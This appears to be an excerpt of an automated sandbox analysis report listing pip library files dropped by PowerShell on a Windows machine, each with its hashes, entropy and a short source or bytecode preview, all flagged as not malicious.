                              Preview:........=.Cf...............................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...d.Z.g.d...Z...G.d...d.........Z...G.d...d.e.........Z.y.)......N)...TYPE_CHECKING..BinaryIO..Dict..Iterable..List..Optional)...HashMismatch..HashMissing..InstallationError)...read_chunks)..._Hash)...NoReturn..sha256).r......sha384..sha512c...........................e.Z.d.Z.d.Z.d.d.e.e.e.e.e.....f.........d.d.f.d...Z.d.d...Z.e.d.e.f.d...........Z.d.e.d.e.d.e.f.d...Z.d.e.e.....d.d.f.d...Z.d.e.e.d.f.....d.d.f.d...Z.d.e.d.d.f.d...Z.d.e.d.d.f.d...Z.d.e.e.e.f.....d.e.f.d...Z.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.f.d...Z.y.)...HasheszaA wrapper that builds multiple hashes at once and checks them against. known-good values.. N..hashes..returnc.....................f.....i.}.|..&|.j...........................D.]...\...}.}.t.........|.........|.|.<.......|.|._.........y.).zo. :param hashes: A dict of algorithm names pointing to lists of allowed.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):13563
                              Entropy (8bit):5.439648470176687
                              Encrypted:false
                              SSDEEP:192:NWQE5KJseJJmXuSc/obIAWr6A0bLh+i1cS6687XgP5MSkZ31F4DokhAzqz:N/E5Kvu+Zprcbl+IP+H31yDokhAzO
                              MD5:226080653051281E4611B949A1D5E9D2
                              SHA1:5BFACE98D4DC4EB069FF6674A970A2EA5728086F
                              SHA-256:7BB0463CB50FB85CCEBA3D1E7859F44FF52101443E55BA1D5EDE495E540221D6
                              SHA-512:1C4830E1DA973FB36B68FD4C44D77DC3F2BA54D5B337769F1C828BB3DF1A8DD79BFE6748F4CBD909F80A76E7BF88363DA9A6E62624BA204B2BAE00AB18CB9F00
                              Malicious:false
                              Preview:........=.CfS-.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$m%Z%..d.d.l&m'Z'..d.d.l(m)Z)..d.d.l*m+Z+....e.jX..........................Z-..e%d.........Z...G.d...d.e/........Z0d.e.e1....d.e1d.e2f.d...Z3e.jh..................d*d.e5d.e.d.....f.d...........Z6d.e5f.d...Z7..G.d...d.e.jp..........................Z9e...G.d...d.................Z:..G.d...d.e.........Z;..G.d ..d!e.jx..................jz..........................Z>..G.d"..d#e.........Z?..G.d$..d%e.........Z@d&e5d'e2d(e.eA....d.e5f.d)..ZBy.)+.....N)...dataclass)...TextIOWrapper)...Filter)...Any..ClassVar..Generator..List..Optional..TextIO..Type)...Console..ConsoleOptions..ConsoleRenderable..RenderableType..RenderResult..RichCast)...NullHighlighter)...RichHandler)...Segment)...Style)...VERBOSE..getLogger)...WINDOWS)...DEPRECATION_MSG_P
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):34127
                              Entropy (8bit):5.445794991738453
                              Encrypted:false
                              SSDEEP:768:mlWLeai5j2FLt2Zit9KtywyO5WmTUV6c4YyCfW6ZGZ5f:msL1O2FpyitcUwyQ86UyAWzZ5f
                              MD5:666AF5AE350CF584A669D7D425C95DE4
                              SHA1:08EBC02EBBFFE945A9C8F3D4F6F242818617856A
                              SHA-256:5DCC8DE808D0EC3B2E4F2628D7F0797B3EE26557693D8C3A0ED7D66F96293093
                              SHA-512:9099FAB398FBA9C55AAA1869C6498FF4ED8BD56482841AD9CF621C88D94A20035D1462ED5AE29F5934247D863835F8E15E2ADA17285699AD4ED2C17D89065558
                              Malicious:false
                              Preview:........=.CfG\........................D.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0m1Z1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7..d.d.l8m9Z9..d.d.l:m;Z;..d.d.l<m=Z=..g.d...Z>..e.j~..................e@........ZA..e(d.........ZBe&e'eC....eCe.f.....ZDe&eEeEeEf.....ZFe&eGe&e$eG....e$eG....f.....f.....ZHe.e.e.eCg.e.f.....ZIe.e.e.eDg.e.f.....ZJd.eGf.d...ZKd.e&eEd.f.....d.e&eEeEeEf.....f.d...ZLd.eGd.d.f.d...ZMd.eGf.d...ZN..e0d...e1d...........e2d.......................dtd.eGd.eOd e$eI....d.d.f.d!..........ZPd"e.d.d.f.d#..ZQd"e.d.d.f.d$..ZReRd%..d&e.d.e.d'e)eDeCf.....d eId.d.f.d(..ZSd.eGd.eGf.d)..ZTdud.eGd*eGd.eGf.d+..ZUd,eGd-e!eG....d.eGf.d...ZVd,eGd.d.f.d/..ZWd,eGd-e!eG....d.eGf.d0..ZXd,eGd.eGf.d1..ZYd,eGd.eGf.d2..ZZd3eGd.eEf.d4..Z[d5e\d.eGf.d6..Z]d7e!e!e.......
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2718
                              Entropy (8bit):4.85197566466278
                              Encrypted:false
                              SSDEEP:48:NJ8jY0dBi4vvjT3Q63yCYxgm/lyA9/unkHCA+nssssZM7l61j:4jxfiGnViCYxb/lrV6kifnssssNR
                              MD5:99107D0906D93D5FC1879CA925599130
                              SHA1:36DE87ED6A274A4DD793D38C5D5DCE16CB32DE29
                              SHA-256:767865855D52BA0DDFA836D5C10507FFEA5FA6F682CC04C12054C05E86FB9B3E
                              SHA-512:FD0539E5EB86D77D4C828FD6474B443FE09BF97440E3ED55B8C27B10F3AFB89CD5610448244AC893456928F7186290A958B80F9EF3687125835F52E0724D1DC0
                              Malicious:false
                              Preview:........=.Cf..........................8.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.....G.d...d.........Z.y.).z.Utilities for defining models......N)...Any..Callable..Typec..........................e.Z.d.Z.d.Z.d.d.g.Z.d.e.d.e.d.....d.d.f.d...Z.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.e.e.g.e.f.....d.e.f.d...Z.y.)...KeyBasedCompareMixinz7Provides comparison capabilities that is based on a key.._compare_key.._defining_class..key..defining_class..returnNc..................... .....|.|._.........|.|._.........y...N).r....r....)...selfr....r....s.... .fC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/models.py..__init__z.KeyBasedCompareMixin.__init__....s................-..........c.....................,.....t.........|.j...........................S.r....)...hashr....).r....s.... r......__hash__z.KeyBasedCompareMixin.__hash__....s..........D..%..%..&..&r......otherc.....................B.....|.j.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2589
                              Entropy (8bit):5.4738492829069125
                              Encrypted:false
                              SSDEEP:48:fhm8IaRI4HwcqDvLSwcqzpHYBZcMidyVQ9hSeMK8Uz2tD7ivZXdW0Vm:f/In4HwceOwc2p4B5GyVQbJT8UCmnm
                              MD5:487CD5E1ADAE58872FBC3E5E1CDAC1FE
                              SHA1:555232B25E27784F5F956A5ED3A37011F2BF92F5
                              SHA-256:1FA737EF0A641E64633A3AF566835E70705E03C2D16580ADFE72E2E7C4D599E3
                              SHA-512:4B917662AE7E5DA7828459FF4AE1ADF79137B6CF2ABB003A8929907F6AB470B2588E110BCFDA5F075C3D5CBCBFC56FDA0D801659FB6C292460FE065A18F884B5
                              Malicious:false
                              Preview:........=.Cf<...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.d.e.........Z...e.j...................e.........Z.d.e.e.....d.e.e.d.f.....d.e.f.d...Z...e.j*..................d...........d.e.d.e.f.d...........Z.d.e.d.e.f.d...Z.y.)......N)...NewType..Optional..Tuple..cast)...specifiers..version....Requirement..NormalizedExtra..requires_python..version_info...returnc..........................|...y.t.........j...................|.........}.t.........j...................d.j...................t.........t.........|.........................}.|.|.v.S.).a..... Check if the given Python version matches a "Requires-Python" specifier... :param version_info: A 3-tuple of ints representing a Python. major-minor-micro version to check (e.g. `sys.version_info[:3]`)... :return: `True` if the given Python version satisfies the requirement.. Otherwise, return `False`... :raises InvalidSpecifier: If `requires_python` has
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4556
                              Entropy (8bit):5.711892681876272
                              Encrypted:false
                              SSDEEP:96:OY3AuveKp42fODzLNahb1T8B94gMGlVa+4CG8j5ud4bXRZD:Oup4zDzkvinllVFJudaZD
                              MD5:3849967B1DC7D00A879D5D16E9FACA46
                              SHA1:BA305E0ACDC1A55B7195D12BAD2C0D3D0BBF65D1
                              SHA-256:E75812AF9C65E90DE8BE6F7A10912490CE694E19D9F714432E285949450600DF
                              SHA-512:47B039160BA0DDA8F57991DBD256A53CA4807E39E91820A9D1C212DE7EB4C2336CA6E90C40CDCE7047678A546D3C91DC2F79E3C50EA3F064F3CA1030B9DEF307
                              Malicious:false
                              Preview:........=.CfS.........................L.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.....e.j...................d.........j...........................Z.......d.d.e.d.e.e.e.........d.e.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....d.e.e.....d.e.d.e.e.....f.d...Z.d.e.d.e.e.....d.e.e.....f.d...Z.d.e.d.e.e.....d.e.d.e.e.....d.e.e.....d.e.d.e.e.....f.d...Z.d.e.d.e.e.....d.e.d.e.e.....f.d...Z.y.)......N)...List..Optional..Sequenceah.... exec(compile('''. # This is <pip-setuptools-caller> -- a caller that pip uses to run setup.py. #. # - It imports setuptools before invoking setup.py, to enable projects that directly. # import from `distutils.core` to work with newer packaging standards.. # - It provides a clear error message when setuptools is not installed.. # - It sets `sys.argv[0]` to the underlying `setup.py`, when invoking `setup.py` so. # setuptools doesn't think the script is `-c`. This avoids the following warning:. # manifest_maker: standard file '-c' not found"..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8724
                              Entropy (8bit):5.553979272179033
                              Encrypted:false
                              SSDEEP:192:t64mR4/llxZpfVrhzwONEJlV8LLaj+nbUg2:t64mR4/llHDhzN+58pn4g2
                              MD5:EFD84636B48218A089A34FF3052E7D38
                              SHA1:1A656F93887CFC516FD571C7E31C8717B6976A01
                              SHA-256:D53F302D89CFA35E43477E20FA53CDC4EBF227901ED586DA439B6039D8E03F78
                              SHA-512:0A8CB6EA7C50A5E783805116E2C10A04DFCA0B58A9BB70A958232722245D677BD297130752B68369181AB6E2A043687B781FCB2FCD2404369A6CACE8F632CDAA
                              Malicious:false
                              Preview:........=.Cf.#..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...e.e.e.e.f.........Z.d.e.e.e.e.f.....d.e.f.d...Z.d.e.e.e.....e.f.....d.e.f.d...Z.d.e.e.e.....e.f.....d.e.e.....f.d...Z...................d.d.e.e.e.....e.f.....d.e.d.e.e.....d.d.d.e.e.e ........d.e.e.e.e.f.........d.e.e.e.........d.e.e.....d.e.e.....d.e.e.....d.e.d.e.f.d...Z!d.e.d.e.d.....f.d...Z"y.)......N)...TYPE_CHECKING..Any..Callable..Iterable..List..Mapping..Optional..Union)...escape)...SpinnerInterface..open_spinner)...InstallationSubprocessError)...VERBOSE..subprocess_logger)...HiddenText)...Literal..args..returnc.....................~.....g.}.|.D.]5..}.t.........|.t.................r.|.j...................|............%|.j...................|............7..|.S.).z&. Create a CommandArgs object.. )...isinstance..list..extend..append).r......command_args..args.... .jC:\Users\b
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12068
                              Entropy (8bit):5.343074609217953
                              Encrypted:false
                              SSDEEP:192:J0mzwNbGX61tbEPPDdFuhwLKHdNLwPWaINA3rmStBeYryszzzZX:JeFnIPPx8hwLIdNMPhIurhtBeYTZ
                              MD5:D2DE5E7B94743F05C9F39799BEFF6088
                              SHA1:8CCE2E8BCBD9034292A7FEDAE468E28CDA109936
                              SHA-256:C592151D26C1A799FCE9674A5DC6F5C49A939961F6F3A552B015865F6CB42223
                              SHA-512:B99D09E0267745574A8CE253985DA490DE8906C395F12866036411E8FD589DC972906D2F4CD56A2B467DBBE4C239AED86849619CC70140629518CA34848E11BB
                              Malicious:false
                              Preview:........=.Cf`$.............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j0..................e.........Z...e.d.d...........Z...e.d.d.d...........Z.d.a.e.e.....e.d.<...e.d.e.d.....f.d...........Z...G.d...d.........Z d.a!e.e ....e.d.<...e.d.e.e d.d.f.....f.d...........Z"..G.d...d.........Z#..e#........Z$..G.d...d.........Z%..G.d...d.e%........Z&y.)......N)...ExitStack..contextmanager)...Path)...Any..Callable..Dict..Generator..List..Optional..TypeVar..Union)...enum..rmtree.._T..TempDirectory)...boundz.build-envz.ephem-wheel-cachez.req-build)...BUILD_ENV..EPHEM_WHEEL_CACHE..REQ_BUILD.._tempdir_manager..return).NNNc................#....z...K.....t.................5.}.t.........|.c.}.a...d.......|.a...d.d.d...........y.#.|.a.w.x.Y.w.#.1.s.w...Y.....y.x.Y.w...w...N).r....r....)...stack..old_tempdir_managers.... .hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11114
                              Entropy (8bit):5.38934956575933
                              Encrypted:false
                              SSDEEP:192:zSqzGGvsqe+q1aSq6AjwhikER7GSJsmfr:znzGs3PofLsR7FJxr
                              MD5:073B68D20B034E3EE4F62284F0C10970
                              SHA1:BBD0E2A6031450404C984842E7A4C31876864E75
                              SHA-256:302F8CD0E0C56F2DC962749849148939E40549F11B75E1C0E2B06CC3E4271211
                              SHA-512:565D5C110DDBBD603FB83A6F16B8C9C098E8425776A562CC09276E6823CEBDF78DAD92F167055259AA32B49C83F36803B3D893F51FB1303F5E1B2A8471E0671B
                              Malicious:false
                              Preview:........=.Cfu"..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.j*..................e.........Z.e.e.z...Z...d.d.l.Z.e.e.z...Z...d.d.l.Z.e.e.z...Z.d.e.f.d...Z.d.e.d.e.e.....f.d...Z d.e.e.....d.e!f.d...Z"d.e.d.e.d.e!f.d...Z#d.e.d.d.f.d...Z$d.e.d.e!f.d...Z%d.d.e.d.e.d.e!d.d.f.d...Z&d.e.d.e.d.d.f.d...Z'..d.d.e.d.e.d.e.e.....d.d.f.d...Z(y.#.e.$.r...e.j7..................d...........Y...w.x.Y.w.#.e.$.r...e.j7..................d...........Y...w.x.Y.w.).z.Utilities related archives.......N)...Iterable..List..Optional)...ZipInfo)...InstallationError)...BZ2_EXTENSIONS..TAR_EXTENSIONS..XZ_EXTENSIONS..ZIP_EXTENSIONS)...ensure_dirz.bz2 module is not availablez.lzma module is not available..returnc.....................Z.....t.........j...................d.........}.t.........j...................|...........|.S.).zBGet the current umask which involves having to set it temporarily.r....)
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2411
                              Entropy (8bit):5.26167765796761
                              Encrypted:false
                              SSDEEP:24:WWgC7VGCo3lARBTyxIHXgrCygFHjyoL8LAzgrt/QgxtNhumw7OgaDsGLzudmqlaP:WSxSGAKXgnKd4/uZtq8mqLI7Sli
                              MD5:ED4835A0EB8B7728EB773CB5448E7477
                              SHA1:40B3BF2D03155388B4A055DA335CA4AC44FA63D1
                              SHA-256:89CC71E5BB3A3A959CFA130D4631ACBC4C9B630129B1B89016AD04BE8E38D208
                              SHA-512:C247597C4B0C4CB8173C8090A6DEC9FC6F82527432AB93C8E26CEE05353FF5F62DB9504C6D76368A6D70149361EAE27E196F57B48D0A77A2C4107A704AE95CEA
                              Malicious:false
                              Preview:........=.Cf..........................r.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.e.....f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.y.)......N)...Optional.....)...WINDOWS..url..returnc.....................R.....d.|.v.r.y.|.j...................d.d.........d.....j...........................S.).N..:r....r....)...split..lower).r....s.... .dC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/urls.py..get_url_schemer........s+.........#.~.......9.9.S.!....Q.....%..%..'..'.......pathc...........................t.........j...................j...................t.........j...................j...................|.................}.t.........j...................j...................d.t.........j...................j...................|.................}.|.S.).zh. Convert a path to a file: URL. The path will be made absolute and have. quoted path parts.. ..file:)...osr......normpath..abspath..urllib..parse..urljoin..request..pa
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4486
                              Entropy (8bit):5.306644899609172
                              Encrypted:false
                              SSDEEP:96:GnXGpfS/bKTpUJKTaz6f5V/OmILVEod7+CPAUU:GWp6/bSUKLBjox+CPAp
                              MD5:A7A148BE9FF0E715C2D10D629AA0C5E8
                              SHA1:9EB38EB968325233684746686AE428AEFE1AAE21
                              SHA-256:33F5A0B64C1D6755FE5105BCB481B66280CD22CDCFF8DE5B5FE6BA92AE5285E6
                              SHA-512:5640C064A45DD9EDC594D7820CE2E59C32CB6184641012DDEDEAD84D44B10EC9EE16657D75FB9F4239FEEA28F729C7AFD35EBEF50FC411E84E18775289EF3741
                              Malicious:false
                              Preview:........=.Cf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.....e.j...................e.........Z...e.j...................d.........Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.e.e.........f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.y.)......N)...List..Optionalz8include-system-site-packages\s*=\s*(?P<value>true|false)..returnc.....................b.....t.........j...................t.........t.........d.t.........j...........................k7..S.).znChecks if sys.base_prefix and sys.prefix match... This handles PEP 405 compliant virtual environments.. ..base_prefix)...sys..prefix..getattr........jC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/virtualenv.py.._running_under_venvr........s ...........:.:.....m.S.Z.Z..@..@..@r....c.....................".....t.........t.........d.........S.).zmChecks if sys.real_prefix is set... This handles virtual environments created with pypa's virtualenv.. ..r
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):5932
                              Entropy (8bit):5.627887269686083
                              Encrypted:false
                              SSDEEP:96:Iy43rh4T7LQOB2pF/Iof8wVIyGO/ekGgvqwBLfOgE4SfXd:Kl4HLZo/IodP+g5BL7C
                              MD5:DFC921D49B41496D1CDAA89E843EE199
                              SHA1:028155DC072A88B46B492B8725A7630D4CB52F67
                              SHA-256:6BA8484D16FB2E8A60543C16F2C691598E4E1B6A7CE5E9C03D3A72CC3505D736
                              SHA-512:AA1ACF5A6C632F970B8720B4336FAC0DEDDC478290A0451FD9A6F09A6DB4A0729B4BA7E851129EF6FE7721681E759BAA7D56D59C9325D5F61A3F4EFCC4ACBD0D
                              Malicious:false
                              Preview:........=.Cf................................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z...e.j ..................e.........Z.d.e.d.e.d.e.e.e.f.....f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.d.e.e.d.f.....f.d...Z.d.e.e.d.f.....d.e.d.d.f.d...Z.y.).z0Support functions for working with wheel files.......N)...Message)...Parser)...Tuple)...BadZipFile..ZipFile)...canonicalize_name)...UnsupportedWheel)......r......wheel_zip..name..returnc............................t.........|.|.........}.t.........|.|.........}.t.........|.........}.t.........|.|...........|.|.f.S.#.t.........$.r.}.t.........|...d.t.........|.......................d.}.~.w.w.x.Y.w.).z.Extract information from the provided wheel, ensuring it meets basic. standards... Returns the name of the .dist-info directory and the parsed WHEEL metadata.. z. has an invalid wheel, N)...wheel_dist_info_dir..wheel_metadata..wheel_versionr......str..check_comp
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3351
                              Entropy (8bit):5.085973629003143
                              Encrypted:false
                              SSDEEP:96:JPQNssZQHToNQ7DtrqOMKk6A3TI/sDNzvHHlHm4s3a:yQHT7DtNk6OTIUDNhG4F
                              MD5:AE014F7CBAEF31C8B32D369C3C6C3945
                              SHA1:B0731381C5AED0A117E812350815008B0AC7623F
                              SHA-256:CAF0C67A54D5BA045AC8F68E17693869BD0ACB8777B8E9007EE3908C04A32266
                              SHA-512:D88BDAFA5DF9926DA4E9B2F877D48EDE1F04458808886C62CF1635E9488ECBC1905600BD50A62330AC7619327D9A1E152EA7BC00F29A688EBD7B980948E6922D
                              Malicious:false
                              Preview:"""Functions brought over from jaraco.text...These functions are not supposed to be used within `pip._internal`. These are.helper functions brought over from `jaraco.text` to enable vendoring newer.copies of `pkg_resources` without having to vendor `jaraco.text` and its entire.dependency cone; something that our vendoring setup is not currently capable of.handling...License reproduced from original source below:..Copyright Jason R. Coombs..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Softw
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1015
                              Entropy (8bit):4.829282893843599
                              Encrypted:false
                              SSDEEP:12:LbB2D68DIK03Bx2uOmcEYBoclg4I2KzY+3VkQyFyu91n5edNmGtz+LXsvKD2XXz9:Z2uK6/bhYlczV1qGzvvXXhuPs
                              MD5:D525AEBD855B84182950CA3E13B6FD7A
                              SHA1:2C20B7D739A304F3715AEA6B90EED634C2217C5F
                              SHA-256:FA31CB384FD31DA673E4115C0A7A122FD11802D2749D77A6E3DB3DA1FE23BCAC
                              SHA-512:46E30C99D22600897809EA272683DAD3251F1938FEA156DD087243C176C6277389B09F544869404BD6E807BB50285A6359B0B2301BE89AB285B175B6F52FE15F
                              Malicious:false
                              Preview:"""Customize logging..Defines custom logger class for the `logger.verbose(...)` method...init_logging() must be called before any other modules that call logging.getLogger.."""..import logging.from typing import Any, cast..# custom log level for `--verbose` output.# between DEBUG and INFO.VERBOSE = 15...class VerboseLogger(logging.Logger):. """Custom Logger, defining a verbose log-level.. VERBOSE is between INFO and DEBUG.. """.. def verbose(self, msg: str, *args: Any, **kwargs: Any) -> None:. return self.log(VERBOSE, msg, *args, **kwargs)...def getLogger(name: str) -> VerboseLogger:. """logging.getLogger, but ensures our VerboseLogger class is returned""". return cast(VerboseLogger, logging.getLogger(name))...def init_logging() -> None:. """Register our VerboseLogger and VERBOSE log level... Should be called before any calls to getLogger(),. i.e. in pip._internal.__init__. """. logging.setLoggerClass(VerboseLogger). logging.addLevelName(VERBO
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1665
                              Entropy (8bit):4.720039128708989
                              Encrypted:false
                              SSDEEP:48:xnB0TGLm/yMUR2o0vmQhaMf4ugRpS1Y9Ft5Xi:xrmqnRg5IMAugRpoY9F/i
                              MD5:C165A5743C1F307CCCD2419071932098
                              SHA1:2F7D46108F0818D083EC0FDEF4BEF65AC5977583
                              SHA-256:B3081C4CA3A6DDD68B7974D6EAFE41512D938B646F1271914181FFC835E4940A
                              SHA-512:855626248CC0F836F31E63FF01E9F4C09C9BD856A9CE160AF776A652EA791073569E773F8A0B57349659F1CE0BA0152112BE5D2CAEFB91D2EFC2DC576C4F8539
                              Malicious:false
                              Preview:""".This code wraps the vendored appdirs module to so the return values are.compatible for the current pip code base...The intention is to rewrite current usages gradually, keeping the tests pass,.and eventually drop this after all usages are changed.."""..import os.import sys.from typing import List..from pip._vendor import platformdirs as _appdirs...def user_cache_dir(appname: str) -> str:. return _appdirs.user_cache_dir(appname, appauthor=False)...def _macos_user_config_dir(appname: str, roaming: bool = True) -> str:. # Use ~/Application Support/pip, if the directory exists.. path = _appdirs.user_data_dir(appname, appauthor=False, roaming=roaming). if os.path.isdir(path):. return path.. # Use a Linux-like ~/.config/pip, by default.. linux_like_path = "~/.config/". if appname:. linux_like_path = os.path.join(linux_like_path, appname).. return os.path.expanduser(linux_like_path)...def user_config_dir(appname: str, roaming: bool = True) -> str:.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1884
                              Entropy (8bit):4.898660610096103
                              Encrypted:false
                              SSDEEP:48:rqA9ydI6zdCdm9HG5FAY/Lne1MOoToPtIWL6wEv:rFX6zEotG5JyVosPt6Vv
                              MD5:AF88D940B9DAABD00B97A3CF427B26E6
                              SHA1:29D3D00672CB363BC71BDF0769EC4FE9841AE318
                              SHA-256:002C817CB823DFF5C6FA2039A26103AD7A833347102B38BC87C1D10489F31BA4
                              SHA-512:6A4B4E2A3037D259C6B388EDEA0E9BB615A6D69BBC4FEFF7B35527CD1740DAE2D99F42E1130813C87E78B2832AEF31634D2F965DD78E9C0CC55F6876424AF5D7
                              Malicious:false
                              Preview:"""Stuff that differs in different Python versions and platform.distributions."""..import logging.import os.import sys..__all__ = ["get_path_uid", "stdlib_pkgs", "WINDOWS"]...logger = logging.getLogger(__name__)...def has_tls() -> bool:. try:. import _ssl # noqa: F401 # ignore unused.. return True. except ImportError:. pass.. from pip._vendor.urllib3.util import IS_PYOPENSSL.. return IS_PYOPENSSL...def get_path_uid(path: str) -> int:. """. Return path's uid... Does not follow symlinks:. https://github.com/pypa/pip/pull/935#discussion_r5307003.. Placed this function in compat due to differences on AIX and. Jython, that should eventually go away... :raises OSError: When path is a symlink or can't be read.. """. if hasattr(os, "O_NOFOLLOW"):. fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW). file_uid = os.fstat(fd).st_uid. os.close(fd). else: # AIX and Jython. # WARNING: time of check vulnerab
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5377
                              Entropy (8bit):4.623716321322792
                              Encrypted:false
                              SSDEEP:96:wcBTxRtuL5CUowd1J+GQfP2qJ25Lv+ENJADraBcUchJFoHcmjfXYMXcvrO:HFxDuL5EkjoGqs5pAD2D1H/ADrO
                              MD5:964CA22D0609D7722001D792568DAF84
                              SHA1:DFBADA13EBA8EF63D4BC33A652ADA480E3E06B42
                              SHA-256:C9D8A7F101BC047A9846C3D8E0E2FA7266F8E026EA5E5D53D31C52F7B5611E49
                              SHA-512:AA278E6157336DA7DC24A60F7E50376C2BAE4F919B828CBF325457935A26A4CCD9F014B32779D5A98CE4C78B64F85B70FD2D07AA233565AF53D5E0CCC537F837
                              Malicious:false
